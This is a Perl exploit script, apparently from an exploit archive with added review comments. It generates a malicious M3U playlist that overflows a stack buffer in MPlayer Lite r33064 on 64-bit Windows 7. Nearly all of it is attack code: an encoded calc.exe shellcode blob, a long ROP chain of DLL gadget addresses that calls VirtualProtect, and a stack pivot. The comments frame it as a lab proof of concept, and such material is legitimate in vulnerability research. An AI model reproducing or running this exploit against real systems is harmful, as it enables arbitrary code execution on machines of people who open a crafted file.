MPlayer (r33064 Lite) Buffer Overflow + ROP exploit
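#!/usr/bin/perl
#
# Exploit Title: Mplayer BOF + ROP Exploit
# Date: 04\05\2011
# Author: Nate_M (based on original WinXP [non ROP] exploit by C4SS!0 and h1ch4m)
# Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
# Version: Lite 33064
# Tested On: Win 7 x64 (doesn't work on 32 bit without heavy modification of offsets)
# CVE : None
#
# Writes Exploit.m3u, a playlist whose single oversized "http:// ..." entry
# overflows a stack buffer in MPlayer Lite r33064.  The entry is laid out as:
#
#   [NOP sled][calc.exe shellcode][pad to FRAME_OFFSET]
#   [VirtualProtect argument frame, filled in at runtime][76 bytes pad]
#   [ROP chain from avcodec.dll / avformat.dll gadgets]
#   [pad to PIVOT_OFFSET][0xFFFFFFFF][ADD ESP,102C stack pivot][2000 bytes]
#
# The ROP chain (section comments are the original author's) derives the
# VirtualProtect() address, writes the shellcode address/length into the
# frame, and finally swaps ESP onto the frame so VirtualProtect is called and
# returns into the shellcode.  The exact arithmetic of each sub-chain has not
# been re-verified here.
#
# Review notes:
#   - Every gadget is an absolute virtual address inside avcodec.dll or
#     avformat.dll, and both buffer offsets were measured on one Win 7 x64
#     install.  The chain therefore only fires when those modules load at the
#     same base as on the author's machine (no relocation) and the stack layout
#     matches; treat it as a PoC, not a portable exploit.
#   - The layout is offset-sensitive.  The original padded with
#     "\x41" x (N - length($buf)), which silently becomes "" if a region ever
#     grows past N and shifts every later offset.  _pad_to() now dies instead.
#   - Lab use only: opening the generated file in the vulnerable player runs the
#     embedded payload (windows/exec calc.exe as generated).

use strict;
use warnings;

# Offsets are measured within $buf; the "http:// " prefix written to the file
# is prepended afterwards and is NOT counted.
use constant NOP_SLED_LEN => 1000;
use constant FRAME_OFFSET => 2368;   # VirtualProtect argument frame starts here
use constant PIVOT_OFFSET => 5172;   # 0xFFFFFFFF + ADD ESP,102C gadget start here
use constant TRAILER_LEN  => 2000;   # trailing filler after the pivot gadget
use constant OUTPUT_FILE  => 'Exploit.m3u';

# windows/exec CMD=calc.exe
# x86/shikata_ga_nai size 227
# badchars = '\x00\x0d\x0a\x26\x2f\x5c\x3e\x3f'
# NOTE(review): the generator comment says 227 bytes, but the literal below is
# 232 bytes as written.  Harmless for the layout, since the sled + shellcode
# region is padded up to FRAME_OFFSET regardless of its exact size.
my $shellcode =
    "\xe8\xff\xff\xff\xff\xc8\x5a\x2b\xc9\xb1\x33" .
    "\xb8\xc4\xc4\xb8\xb3\x66\x81\xec\x10\x10" .
    "\x31\x42\x17\x83\xc2\x04\x03\x86\xd7\x5a\x46\xfa" .
    "\x30\x13\xa9\x02\xc1\x44\x23\xe7\xf0\x56\x57\x6c\xa0\x66" .
    "\x13\x20\x49\x0c\x71\xd0\xda\x60\x5e\xd7\x6b\xce\xb8\xd6" .
    "\x6c\xfe\x04\xb4\xaf\x60\xf9\xc6\xe3\x42\xc0\x09\xf6\x83" .
    "\x05\x77\xf9\xd6\xde\xfc\xa8\xc6\x6b\x40\x71\xe6\xbb\xcf" .
    "\xc9\x90\xbe\x0f\xbd\x2a\xc0\x5f\x6e\x20\x8a\x47\x04\x6e" .
    "\x2b\x76\xc9\x6c\x17\x31\x66\x46\xe3\xc0\xae\x96\x0c\xf3" .
    "\x8e\x75\x33\x3c\x03\x87\x73\xfa\xfc\xf2\x8f\xf9\x81\x04" .
    "\x54\x80\x5d\x80\x49\x22\x15\x32\xaa\xd3\xfa\xa5\x39\xdf" .
    "\xb7\xa2\x66\xc3\x46\x66\x1d\xff\xc3\x89\xf2\x76\x97\xad" .
    "\xd6\xd3\x43\xcf\x4f\xb9\x22\xf0\x90\x65\x9a\x54\xda\x87" .
    "\xcf\xef\x81\xcd\x0e\x7d\xbc\xa8\x11\x7d\xbf\x9a\x79\x4c" .
    "\x34\x75\xfd\x51\x9f\x32\xf1\x1b\x82\x12\x9a\xc5\x56\x27" .
    "\xc7\xf5\x8c\x6b\xfe\x75\x25\x13\x05\x65\x4c\x16\x41\x21" .
    "\xbc\x6a\xda\xc4\xc2\xd9\xdb\xcc\xa0\xbc\x4f\x8c\x08\x5b" .
    "\xe8\x37\x55";

# gadget($addr [, $count]) -> little-endian dword(s) for one ROP entry.
sub gadget {
    my ($addr, $count) = @_;
    $count = 1 unless defined $count;
    return pack('V', $addr) x $count;
}

# _pad_to($buf, $target, $what) -> $buf padded with "\x41" up to exactly
# $target bytes.  Dies if $buf is already longer: the original code would have
# silently emitted no padding and shifted every later offset.
sub _pad_to {
    my ($buf, $target, $what) = @_;
    my $gap = $target - length $buf;
    die sprintf("**Error: %s is %d bytes, already past offset %d\n",
                $what, length $buf, $target)
        if $gap < 0;
    return $buf . ("\x41" x $gap);
}

# build_payload() -> the complete playlist entry body (without "http:// ").
# Pure function of the constants and $shellcode above; does no I/O.
sub build_payload {
    my $buf = "\x90" x NOP_SLED_LEN;
    $buf .= $shellcode;
    $buf = _pad_to($buf, FRAME_OFFSET, 'sled + shellcode');

    # VirtualProtect() argument frame.  The five placeholders are overwritten
    # at runtime by the chain's MOV DWORD PTR [EAX],EDX gadgets (per the
    # author's section comments below); only lpflOldProtect is fixed here.
    $buf .= "0000";                 # VirtualProtect addr
    $buf .= "1111";                 # Return addr
    $buf .= "2222";                 # lpAddress
    $buf .= "3333";                 # dwsize
    $buf .= "4444";                 # flNewProtect
    $buf .= "\x60\x63\x12\x6B";     # lpflOldProtect
    $buf .= "\x41" x 76;

    ##### Begin ROP Chain, create anchor in memory #####
    $buf .= gadget(0x649ABC7B);     # PUSH ESP # POP EBX # POP ESI # RET [avformat.dll]
    $buf .= "\x41" x 4;             # consumed by the extra POP ESI
    $buf .= gadget(0x6B0402A9);     # MOV EAX,EBX # POP EBX # RET [avcodec.dll]
    $buf .= "\x41" x 4;             # consumed by the extra POP EBX
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]
    $buf .= gadget(0x6AD9AC5C);     # XOR EAX,EAX # RET 0 [avcodec.dll]
    $buf .= gadget(0x6AD5C728);     # ADD EAX,69 # RET 69 [avcodec.dll]
    $buf .= gadget(0x6AD79CAC);     # DEC EAX # RET 68 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]
    $buf .= gadget(0x6AD5130E);     # SUB EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AF1DCB5);     # XCHG EAX,ECX # RET [avcodec.dll]
    $buf .= gadget(0x6AFA5EE9);     # MOV EAX,ECX # RET [avcodec.dll]
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]

    ##### Find location of VirtualProtect() in kernel32.dll #####
    # Builds a constant in EAX by repeated doubling (MOV EDX,EAX / ADD EAX,EDX)
    # plus INC/DEC adjustments; the "RET nn" comments track the running value.
    $buf .= gadget(0x6AD9AC5C);     # XOR EAX,EAX # RET 0 [avcodec.dll]
    $buf .= gadget(0x6AD5C728);     # ADD EAX,69 # RET 69 [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 2);  # INC EAX # RET 6B [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET D6 [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD);     # INC EAX # RET D7 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 1AE [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 35C [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD);     # INC EAX # RET 35D [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 6BA [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET D74 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 1AE8 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 35D0 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AF1DCB5);     # XCHG EAX,ECX # RET [avcodec.dll]
    $buf .= gadget(0x6AD5130E);     # SUB EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AE8F378);     # MOV EAX,DWORD PTR DS:[EAX] # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AD9AC5C);     # XOR EAX,EAX # RET 0 [avcodec.dll]
    $buf .= gadget(0x6AD5C728);     # ADD EAX,69 # RET 69 [avcodec.dll]
    $buf .= gadget(0x6AD79CAC, 12); # DEC EAX # RET 5D [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET BA [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 174 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 2E8 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 5D0 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET BA0 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 1740 [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD);     # INC EAX # RET 1741 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 2E82 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]
    $buf .= gadget(0x6AE62D12);     # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 4);  # INC EAX # RET [avcodec.dll]

    ##### Find location of shellcode #####
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]
    $buf .= gadget(0x6B0B79D2);     # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AD9AC5C);     # XOR EAX,EAX # RET 0 [avcodec.dll]
    $buf .= gadget(0x6AD5C728);     # ADD EAX,69 # RET 69 [avcodec.dll]
    $buf .= gadget(0x6AD79CAC, 31); # DEC EAX # RET 4A [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 94 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 128 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 250 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 4A0 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 940 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AD5130E);     # SUB EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x649509B4);     # XCHG EAX,EBP # RET [avformat.dll]
    $buf .= gadget(0x6AE62D12);     # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 4);  # INC EAX # RET [avcodec.dll]
    $buf .= gadget(0x6AE62D12);     # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 4);  # INC EAX # RET [avcodec.dll]

    ##### Find approx length of shellcode #####
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AE62D12);     # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 4);  # INC EAX # RET [avcodec.dll]

    ##### Set shellcode to read/write #####
    # Builds 0x40 in EAX (author's "RET 4 / 8 / 10 / 20 / 40" trail) and stores
    # it into the frame; 0x40 is the flNewProtect value the chain passes.
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AD9AC5C);     # XOR EAX,EAX # RET 0 [avcodec.dll]
    $buf .= gadget(0x6AD5C6FD, 4);  # INC EAX # RET 4 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 8 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 10 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 20 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6B0B4113);     # ADD EAX,EDX # RET 40 [avcodec.dll]
    $buf .= gadget(0x6B0B79D0);     # MOV EDX,EAX # MOV EAX,EDX # RET [avcodec.dll]
    $buf .= gadget(0x6AFCD525);     # XCHG EAX,ESI # RET [avcodec.dll]
    $buf .= gadget(0x6AE62D12);     # MOV DWORD PTR DS:[EAX],EDX # RET [avcodec.dll]

    ##### And profit #####
    # Walk EAX back to the top of the frame and swap it into ESP, so the next
    # RET lands on the (now filled-in) VirtualProtect address.
    $buf .= gadget(0x6AD79CAC, 16); # DEC EAX # RET [avcodec.dll]
    $buf .= gadget(0x6AD44B94);     # XCHG EAX,ESP # RET

    # Stack pivot region.  Per the original layout this is where control is
    # first gained: the ADD ESP,102C gadget moves ESP into the chain above.
    # The 0xFFFFFFFF dword precedes it; its role is not documented by the author.
    $buf = _pad_to($buf, PIVOT_OFFSET, 'ROP chain');
    $buf .= "\xff\xff\xff\xff";
    $buf .= gadget(0x64953AD6);     # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RET
    $buf .= "\x41" x TRAILER_LEN;

    return $buf;
}

# write_m3u($path, $payload): write "http:// " . $payload to $path.
# Dies with the OS error on open/close failure.  Opened in binary mode so a
# gadget byte is never rewritten by newline translation on Windows.
sub write_m3u {
    my ($path, $payload) = @_;
    open(my $fh, '>', $path) or die "**Error:\n$!\n";
    binmode $fh;
    print {$fh} "http:// " . $payload;
    close($fh) or die "**Error closing $path:\n$!\n";
    return;
}

# Only generate the file when run as a script; a `require` (e.g. for testing
# build_payload) does nothing.
unless (caller) {
    print q{
BOF/ROP exploit created by Nate_M
Now writing M3U file...
};
    write_m3u(OUTPUT_FILE, build_payload());
    print "\tFile Created With Sucess\n\n";
}

# 0day.today [2024-12-24] #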